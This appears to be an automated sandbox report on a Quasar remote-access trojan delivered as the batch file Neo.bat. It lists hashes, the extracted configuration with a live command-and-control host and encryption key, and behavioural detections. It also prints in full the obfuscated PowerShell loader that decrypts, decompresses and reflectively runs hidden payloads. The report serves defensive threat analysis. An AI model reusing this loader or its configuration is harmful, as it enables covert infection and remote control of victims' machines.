quasar | f8310b9b5ae9c3f90b01d84c8022b6fdd7bbd29ba56a600d948be6eff75d426f

General

Target

Neo.bat
Size

272KB
MD5

c674b29c2da91c60f4221b2e87fe8c15
SHA1

3b79cb45ace0ddfedf1fa6f1b012321d830bf94f
SHA256

f8310b9b5ae9c3f90b01d84c8022b6fdd7bbd29ba56a600d948be6eff75d426f
SHA512

4f1c04ca8e4b0a2fd42a548245f49170ec65857098ac0f9bcebb96e10e19423f3a1c361c0ef0e5b9b1578d481342edcaca71c7a5846d1cd803db4868705dbb1b
SSDEEP

6144:PX3bTXRS0eSuT+pRHttyzLOh8cU/rzckvlfFPtoqNwRUo:fPBmSuWXtyziacUDzNfPtoUC

Score

10^/10

quasar slave execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.1.0

Botnet

Slave

C2

runderscore00-42512.portmap.io:42512

Mutex

QSR_MUTEX_aYgVTolyJfnSo2kPQj

Attributes

encryption_key
PK7SpR1WESSqHBwmTfVi
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral1/memory/2212-33-0x0000000009830000-0x000000000988E000-memory.dmp	family_quasar

Blocklisted process makes network request 29 IoCs

flow	pid	Process
2	2212	powershell.exe
5	2212	powershell.exe
6	2212	powershell.exe
8	2212	powershell.exe
9	2212	powershell.exe
10	2212	powershell.exe
11	2212	powershell.exe
12	2212	powershell.exe
13	2212	powershell.exe
14	2212	powershell.exe
15	2212	powershell.exe
16	2212	powershell.exe
17	2212	powershell.exe
18	2212	powershell.exe
19	2212	powershell.exe
22	2212	powershell.exe
24	2212	powershell.exe
25	2212	powershell.exe
26	2212	powershell.exe
27	2212	powershell.exe
28	2212	powershell.exe
29	2212	powershell.exe
30	2212	powershell.exe
31	2212	powershell.exe
32	2212	powershell.exe
33	2212	powershell.exe
42	2212	powershell.exe
43	2212	powershell.exe
44	2212	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2212	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2212	powershell.exe
2212	powershell.exe
2212	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2212	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2212	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 3648 wrote to memory of 2212	3648	cmd.exe	73
PID 3648 wrote to memory of 2212	3648	cmd.exe	73
PID 3648 wrote to memory of 2212	3648	cmd.exe	73

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Neo.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3648
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cQOtDanpy2r1fIq2RmiAP3pi2F+wAyCLQ56qZLg4djg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JbayyMB6uwbPJLlahgTXHQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gWazs=New-Object System.IO.MemoryStream(,$param_var); $Cqmzr=New-Object System.IO.MemoryStream; $aiCtn=New-Object System.IO.Compression.GZipStream($gWazs, [IO.Compression.CompressionMode]::Decompress); $aiCtn.CopyTo($Cqmzr); $aiCtn.Dispose(); $gWazs.Dispose(); $Cqmzr.Dispose(); $Cqmzr.ToArray();}function execute_function($param_var,$param2_var){ $DGfYx=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GbNUb=$DGfYx.EntryPoint; $GbNUb.Invoke($null, $param2_var);}$IuUoW = 'C:\Users\Admin\AppData\Local\Temp\Neo.bat';$host.UI.RawUI.WindowTitle = $IuUoW;$RQVpb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($IuUoW).Split([Environment]::NewLine);foreach ($ykdlx in $RQVpb) { if ($ykdlx.StartsWith(':: ')) { $fedhE=$ykdlx.Substring(3); break; }}$payloads_var=[string[]]$fedhE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2212

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tjaeljl4.s5a.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/2212-7-0x0000000007F50000-0x0000000007FB6000-memory.dmp

Filesize
408KB

Download
memory/2212-29-0x0000000009440000-0x000000000945A000-memory.dmp

Filesize
104KB

Download
memory/2212-5-0x00000000075E0000-0x0000000007602000-memory.dmp

Filesize
136KB

Download
memory/2212-6-0x0000000007EE0000-0x0000000007F46000-memory.dmp

Filesize
408KB

Download
memory/2212-2-0x00007FFDAA5C0000-0x00007FFDAA79B000-memory.dmp

Filesize
1.9MB

Download
memory/2212-8-0x0000000007FC0000-0x0000000008310000-memory.dmp

Filesize
3.3MB

Download
memory/2212-11-0x0000000007800000-0x000000000781C000-memory.dmp

Filesize
112KB

Download
memory/2212-12-0x0000000008870000-0x00000000088BB000-memory.dmp

Filesize
300KB

Download
memory/2212-13-0x0000000008600000-0x0000000008676000-memory.dmp

Filesize
472KB

Download
memory/2212-3-0x0000000004EC0000-0x0000000004EF6000-memory.dmp

Filesize
216KB

Download
memory/2212-4-0x0000000007840000-0x0000000007E68000-memory.dmp

Filesize
6.2MB

Download
memory/2212-30-0x0000000009460000-0x0000000009468000-memory.dmp

Filesize
32KB

Download
memory/2212-28-0x0000000009EA0000-0x000000000A518000-memory.dmp

Filesize
6.5MB

Download
memory/2212-31-0x0000000009730000-0x00000000097CC000-memory.dmp

Filesize
624KB

Download
memory/2212-32-0x0000000007210000-0x0000000007244000-memory.dmp

Filesize
208KB

Download
memory/2212-33-0x0000000009830000-0x000000000988E000-memory.dmp

Filesize
376KB

Download
memory/2212-34-0x000000000A520000-0x000000000AA1E000-memory.dmp

Filesize
5.0MB

Download
memory/2212-35-0x00000000099D0000-0x0000000009A62000-memory.dmp

Filesize
584KB

Download
memory/2212-36-0x0000000009960000-0x0000000009972000-memory.dmp

Filesize
72KB

Download
memory/2212-37-0x0000000009D80000-0x0000000009DBE000-memory.dmp

Filesize
248KB

Download
memory/2212-41-0x000000000AA70000-0x000000000AA7A000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing